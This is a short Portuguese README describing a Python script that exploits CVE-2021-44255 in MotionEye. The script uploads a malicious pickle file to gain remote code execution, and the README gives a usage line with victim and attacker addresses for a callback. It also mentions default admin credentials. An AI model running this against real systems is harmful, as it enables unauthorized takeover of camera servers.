
Um script Python 3 que envia um arquivo tasks.pickle que permite RCE no MotionEye. CVE-2021-44255
Um script Python 3 que envia um arquivo tasks.pickle que permite RCE no MotionEye. Você precisa de credenciais de administrador, então não deveria ser um grande problema. Infelizmente, MotionEye/MotionEyeOS podem ser frequentemente encontrados rodando com credenciais padrão.
Exemplo:
main.py --victim 192.168.1.2 --attacker 192.168.1.3:4444
Onde vítima e atacante estão no formato ip:port, a menos que seja a porta 80. Nesse caso, a porta pode ser omitida. Isso usa o nome de usuário padrão admin com uma senha em branco. Também existem opções de CLI para nomes de usuário/senhas alternativos. Consulte o código para mais detalhes.
CVE-2021-44255
Veja https://www.pizzapower.me/2021/10/09/self-hosted-security-part-1-motioneye para um artigo sobre este e outros problemas.